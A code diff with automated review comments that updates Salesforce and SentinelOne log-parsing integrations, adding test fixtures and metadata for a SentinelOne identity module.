+++ b/Salesforce/salesforce-events/ingest/parser.yml
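Review bot: With `raise_errors: false` on the dsv.parse-dsv stage, a line that does not fit `columnnames` no longer fails the event but leaves `message` unset, and nothing in the hunk records that fallback. The stages after this one (outside the hunk) that read `message.<column>` must therefore tolerate the field being absent, and the event should still be retained with its `original.message` so a malformed or truncated line remains visible to the analyst rather than collapsing into an empty event. A comment on the added line would make the intent explicit, e.g. `# best-effort: a non-DSV line leaves message unset instead of rejecting the event`. The two Retarus grok stages (`sender`, `recipient`) in this commit carry the same consideration.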
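Review bot: The description `Salesforce user agent` for `salesforce.user_agent` reads as if the field held a user-agent string, but it is declared `type: number` and the parser change in this commit fills it with `USER_AGENT | int` (`12024001` in salesforce_apex_rest_api.json). Say what the number is so nobody queries it for a browser string, e.g. `description: Numeric USER_AGENT identifier reported in Salesforce event logs (not a browser user-agent string)`.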
@@ -72,7 +72,7 @@ stages:
 filter: "{{json_event.output.BROWSER_TYPE != None}}"
 - set:
- user_agent.original: "{{json_event.output.USER_AGENT}}"
+ salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}"
 filter: "{{json_event.output.USER_AGENT != None}}"
 set_source_ip:
@@ -147,6 +147,14 @@ stages:
 user.name: "{{json_event.output.USERNAME}}"
 filter: "{{json_event.output.USERNAME != None}}"
+ - set:
+ user.name: "{{json_event.output.USER_NAME}}"
+ filter: "{{json_event.output.USER_NAME != None and '@' not in json_event.output.USER_NAME}}"
+
+ - set:
+ user.email: "{{json_event.output.USER_NAME}}"
+ filter: "{{json_event.output.USER_NAME != None and '@' in json_event.output.USER_NAME}}"
+
 - set:
 user.email: "{{json_event.output.USER}}"
 filter: "{{json_event.output.USER != None}}"
@@ -201,6 +209,7 @@ stages:
 tls.cipher: "{{json_event.output.CIPHER_SUITE}}"
 tls.version: "{{json_event.output.TLS_PROTOCOL}}"
+ url.original: "{{json_event.output.LOGIN_URL}}"
 host.id: "{{json_event.output.DEVICE_ID}}"
 host.os.name: "{{json_event.output.OS_NAME}}"
 host.os.version: "{{json_event.output.OS_VERSION}}"
diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
new file mode 100644
index 000000000..2250f3670
--- /dev/null
+++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json
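Review bot: `{{json_event.output.USER_AGENT | int}}` coerces every USER_AGENT to an integer, and the `int` filter (Jinja semantics) yields 0 for a non-numeric string, so a browser-style value such as the `Mozilla/5.0 ... Chrome/93.0.4577.82 ...` string in salesforce_complete_event_1.json now becomes `"user_agent": 0` while this commit also drops `user_agent.original` from that fixture, leaving the raw string nowhere in the event. Only some Salesforce event types carry a numeric USER_AGENT; keep the removed `user_agent.original` mapping for the others and guard both stages on the value's form, e.g. `filter: "{{json_event.output.USER_AGENT != None and json_event.output.USER_AGENT.isdigit()}}"` for the numeric one and `not ...isdigit()` for the string one (assuming the template sandbox exposes string methods, as `| lower` elsewhere suggests). The raw UA string is a routine pivot for session-hijack and impossible-travel checks, so silently zeroing it is a detection loss. The enclosing `set:` stage starts before this hunk.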
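Review bot: `url.original` is filled from LOGIN_URL, but the two login fixtures in this commit show the value arriving both as a full URL (`https://login.salesforce.com`, which yields `url.domain`, `url.scheme`, etc.) and as a bare host (`test.my.salesforce.com` in salesforce_login_event_1.json, which yields only `url.original`). The login host is what an analyst filters on to separate custom-domain logins from the standard endpoint, so consider a separate `set` stage such as `url.domain: "{{json_event.output.LOGIN_URL}}"` with `filter: "{{json_event.output.LOGIN_URL != None and '://' not in json_event.output.LOGIN_URL}}"` so both forms expose the host in the same field. The enclosing `set:` stage starts before this hunk.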
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + }, + "expected": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "event": { + "category": [ + "network" + ], + "dataset": "ApexRestApi", + "type": [ + "info" + ] + }, + "@timestamp": 
"2034-02-21T02:48:31.272150Z",
+ "http": {
+ "request": {
+ "method": "POST"
+ },
+ "response": {
+ "mime_type": "application/json",
+ "status_code": 200
+ }
+ },
+ "organization": {
+ "id": "11111111111111111"
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ]
+ },
+ "salesforce": {
+ "login": {
+ "key": "xxxxxxxxxxxxxx"
+ },
+ "request": {
+ "id": "5-Acr8biM2uu2UsrkBY5B-",
+ "status": "S"
+ },
+ "session": {
+ "key": {
+ "id": "session-key12323"
+ }
+ },
+ "user": {
+ "type": "Standard"
+ },
+ "user_agent": 12024001
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4"
+ },
+ "url": {
+ "path": "/requests"
+ },
+ "user": {
+ "id": "user123123123123"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event.json b/Salesforce/salesforce-events/tests/salesforce_complete_event.json
index 03b6811ee..ceeb7b881 100644
--- a/Salesforce/salesforce-events/tests/salesforce_complete_event.json
+++ b/Salesforce/salesforce-events/tests/salesforce_complete_event.json
@@ -45,6 +45,9 @@
 "related": {
 "ip": [
 "1.2.3.4"
+ ],
+ "user": [
+ "test_user"
 ]
 },
 "salesforce": {
@@ -119,7 +122,8 @@
 "query": "queryParam1=val1&queryParam2=val2"
 },
 "user": {
- "id": "00530000009M943"
+ "id": "00530000009M943",
+ "name": "test_user"
 },
 "user_agent": {
 "device": {
diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
index bc1c801cf..89c90352a 100644
--- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
+++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
@@ -45,6 +45,9 @@
 "related": {
 "ip": [
 "1.2.3.4"
+ ],
+ "user": [
+ "test_user"
 ]
 },
 "salesforce": {
@@ -100,7 +103,8 @@
 "user": {
 "initiated_logout": true,
 "type": "admin"
- }
+ },
+ "user_agent": 0
 },
 "source": {
 "address": "1.2.3.4",
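Review bot: The expected `@timestamp` `2034-02-21T02:48:31.272150Z` is a decade after the event: the input's TIMESTAMP is `20241029112721.500` (29 Oct 2024 11:27:21.500, which TIMESTAMP_DERIVED states explicitly), so this fixture pins a mis-parsed date instead of catching it. The value is exactly what results if the `yyyyMMddHHmmss.SSS` digits are read as a number and scaled into an epoch, which points at the parser's timestamp handling rather than the data; that parser is not in this diff. The fixture should assert `"@timestamp": "2024-10-29T11:27:21.500000Z"`, derived from TIMESTAMP_DERIVED or from TIMESTAMP with its real format, because future-dated events fall outside time-bounded detection windows and can be expired by retention in the wrong order. salesforce_login_event_1.json in this commit has the same problem (`2034-02-21T02:43:24.464103Z` for `20241026044641.024`).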
@@ -114,19 +118,12 @@
 "path": "/sObject/0064100000JXITSAA5/view"
 },
 "user": {
- "id": "00530000009M943"
+ "id": "00530000009M943",
+ "name": "test_user"
 },
 "user_agent": {
- "device": {
- "name": "Other"
- },
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36",
- "os": {
- "name": "Windows",
- "version": "10"
- },
- "version": "93.0.4577"
+ "version": "93.0.4577.82"
 }
 }
 }
\ No newline at end of file
diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event.json b/Salesforce/salesforce-events/tests/salesforce_login_event.json
index e87c6f5a9..7719dc746 100644
--- a/Salesforce/salesforce-events/tests/salesforce_login_event.json
+++ b/Salesforce/salesforce-events/tests/salesforce_login_event.json
@@ -28,6 +28,15 @@
 "address": "192.168.0.1",
 "ip": "192.168.0.1"
 },
+ "url": {
+ "domain": "login.salesforce.com",
+ "original": "https://login.salesforce.com",
+ "port": 443,
+ "registered_domain": "salesforce.com",
+ "scheme": "https",
+ "subdomain": "login",
+ "top_level_domain": "com"
+ },
 "user": {
 "email": "john.doe@example.com"
 }
diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event_1.json b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json
new file mode 100644
index 000000000..ed22aefee
--- /dev/null
+++ b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json
@@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}" + }, + "expected": { + "message": 
"{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "Login", + "type": [ + "start" + ] + }, + "@timestamp": "2034-02-21T02:43:24.464103Z", + "organization": { + "id": "ORG_ID_TEST" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "salesforce": { + "api": { + "version": "9998.0" + }, + "login": { + "key": "xxxxxxxxxxxxx", + "status": "LOGIN_NO_ERROR", + "sub_type": "oauthclientcredentials" + }, + "request": { + "id": "request_id_test" + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "tls": { + "cipher": "TLS_AES_256_GCM_SHA384", + "version": "TLSv1.3" + }, + "url": { + "original": "test.my.salesforce.com", + "path": "/services/oauth2/token" + }, + "user": { + "email": "user.integration@test.com", + "id": "USER_ID_TEST" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Python Requests", + "original": "python-requests/2.28.0", + "os": { + "name": "Other" + }, + "version": "2.28" + } + } +} \ 
No newline at end of file diff --git a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json index 9a4b1bf43..9acf6e91d 100644 --- a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json +++ b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json @@ -682,6 +682,58 @@ } ] }, + { + "value": "Process {process.command_line} was created by {process.user.name}", + "conditions": [ + { + "field": "event.action", + "value": "Process Creation" + }, + { + "field": "process.user.name" + }, + { + "field": "process.command_line" + } + ], + "relationships": [ + { + "source": "process.user.name", + "target": "process.parent.command_line", + "type": "created" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.title", + "type": "has process title" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "has name" + }, + { + "source": "process.command_line", + "target": "process.title", + "type": "has title" + }, + { + "source": "process.command_line", + "target": "process.name", + "type": "has name" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "created" + }, + { + "source": "process.user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "Process {process.command_line} was created by {user.name}", "conditions": [ diff --git a/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json new file mode 100644 index 000000000..62320459c --- /dev/null +++ b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json 
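Review bot: `event.outcome` is not pinned in the salesforce_login_event_1 expectation even though the input carries `LOGIN_STATUS: LOGIN_NO_ERROR`, which is the one field a failed-login or password-spray rule needs; mapping LOGIN_STATUS to `"outcome": "success"` / `"failure"` and adding it to the expected `event` object would close that gap. The expectation also shows `"url": {"original": "test.my.salesforce.com", ...}` with no `url.domain`, while the sibling salesforce_login_event.json expectation gets domain/registered_domain for `https://login.salesforce.com` — presumably because LOGIN_URL here has no scheme and the URL parser does not split it; prefixing a scheme before parsing, or setting url.domain directly, would make the two fixtures consistent. `related.user` is likewise absent despite `user.email`, unlike the complete_event fixtures updated in this same commit. The parser itself is not in the diff, so these points are inferred from the expected output.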
@@ -0,0 +1,96 @@ +{ + "input": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 
(23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}" + }, + "expected": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 
https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}", + "event": { + "action": "Process Creation", + "category": [ + "process" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-12-05T08:18:51.479000Z", + "agent": { + "version": "23.3.1.7037" + }, + "deepvisibility": { + 
"agent": { + "managment_url": "mgm-testing-test.sentinelone.net", + "trace_id": "XXXXXXX-XXXXXXXX-XXXXXXX", + "uuid": "xxxx-XXXXXX-XXXXx-xxxxx" + }, + "event": { + "category": "process", + "type": "Process Creation" + }, + "host": { + "os": { + "revision": "14.7.1 (23H222)" + } + }, + "process": { + "target": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "storyline_id": "EE9FB66D-9B03-4286-971C-7A20615D157B", + "title": "curl", + "working_directory": "/usr/bin" + } + } + }, + "host": { + "name": "LMFR0205", + "os": { + "family": "osx", + "name": "OS X" + }, + "type": "laptop" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "pid": 30273, + "start": "2024-12-05T08:18:51.479000Z", + "title": "curl", + "user": { + "name": "test.user" + }, + "working_directory": "/usr/bin" + }, + "related": { + "hash": [ + 
"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42", + "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "fe61928bbd84ed16fc4f934307bf2f16" + ] + }, + "url": { + "domain": "test.test", + "original": "https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "path": "/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "port": 443, + "scheme": "https", + "subdomain": "test" + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/CHANGELOG.md b/SentinelOne/identity/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/SentinelOne/identity/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/SentinelOne/identity/_meta/fields.yml b/SentinelOne/identity/_meta/fields.yml new file mode 100644 index 000000000..36e8acf65 --- /dev/null +++ b/SentinelOne/identity/_meta/fields.yml 
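Review bot: `related.user` is absent from the process_processcreation_2 expectation even though `process.user.name` is `"test.user"`, so the user pivot the new `{process.user.name}` smart-description relies on is not reachable through `related.*`; the Salesforce fixtures in this same commit add `"related": {"user": ["test_user"]}` next to `user.name`, and the process.user.name branch should do the same. Separately, `"working_directory": "/usr/bin"` is exactly the directory of `process.executable`, which suggests it is derived from `tgt.process.image.path` rather than a real current working directory — under the ECS field name that is misleading, and it would be better dropped or moved. The parser producing these fields is outside the diff, so both points are inferred from the expected output.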
@@ -0,0 +1,39 @@
+sentinelone.identity.attackSurfaces:
+ description: ''
+ name: sentinelone.identity.attackSurfaces
+ type: keyword
+
+sentinelone.identity.classification:
+ description: ''
+ name: sentinelone.identity.classification
+ type: keyword
+
+sentinelone.identity.confidenceLevel:
+ description: ''
+ name: sentinelone.identity.confidenceLevel
+ type: keyword
+
+sentinelone.identity.id:
+ description: ''
+ name: sentinelone.identity.id
+ type: keyword
+
+sentinelone.identity.name:
+ description: ''
+ name: sentinelone.identity.name
+ type: keyword
+
+sentinelone.identity.result:
+ description: ''
+ name: sentinelone.identity.result
+ type: keyword
+
+sentinelone.identity.status:
+ description: ''
+ name: sentinelone.identity.status
+ type: keyword
+
+sentinelone.identity.storyLineId:
+ description: ''
+ name: sentinelone.identity.storyLineId
+ type: keyword
diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png
new file mode 100644
index 000000000..817c84f53
Binary files /dev/null and b/SentinelOne/identity/_meta/logo.png differ
diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
new file mode 100644
index 000000000..e8b52a2d5
--- /dev/null
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -0,0 +1,11 @@
+uuid: b502e522-6996-4b12-9538-f69326b68243
+name: SentinelOne Singularity Identity [ALPHA]
+slug: sentinelone-singularity-identity
+automation_connector_uuid: 2d772558-821d-4663-87bd-af28bbb8415a
+automation_module_uuid: ff675e74-e5c1-47c8-a571-d207fc297464
+
+description: >-
+ SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.
+
+data_sources:
+ Application logs: activites performed on SentinelOne infrastructure are logged
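Review bot: Every `description` in fields.yml is an empty string, so anyone browsing the field catalogue gets no hint of what `classification`, `confidenceLevel`, `status` or `attackSurfaces` hold, even though the sample alerts in this commit show their vocabularies. Suggested text, grounded in those samples: `description: 'Alert classification assigned by Singularity Identity, e.g. ENUMERATION or UNKNOWN'` for classification, `description: 'Confidence that the alert is a true threat, e.g. MALICIOUS'` for confidenceLevel, `description: 'Triage status of the alert, e.g. NEW'` for status, and `description: 'Attack surfaces the alert concerns, e.g. IDENTITY'` for attackSurfaces. `id`, `name`, `result` and `storyLineId` can be described as the SentinelOne alert identifier, alert name, alert result and storyline identifier respectively.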
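Review bot: The `data_sources` entry in manifest.yml reads `activites performed on SentinelOne infrastructure are logged`, which has a typo and does not describe what the parser actually ingests — the samples are identity threat alerts (event.kind alert) from the Singularity Identity detection source, not activity on SentinelOne infrastructure. Suggest `Application logs: identity threat alerts raised by SentinelOne Singularity Identity`.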
diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json
new file mode 100644
index 000000000..e09c5db80
--- /dev/null
+++ b/SentinelOne/identity/_meta/smart-descriptions.json
@@ -0,0 +1,46 @@
+[
+ {
+ "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status} on {process.command_line}",
+ "conditions": [
+ {
+ "field": "sentinelone.identity.name"
+ },
+ {
+ "field": "sentinelone.identity.status"
+ },
+ {
+ "field": "process.command_line"
+ }
+ ]
+ },
+ {
+ "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status}",
+ "conditions": [
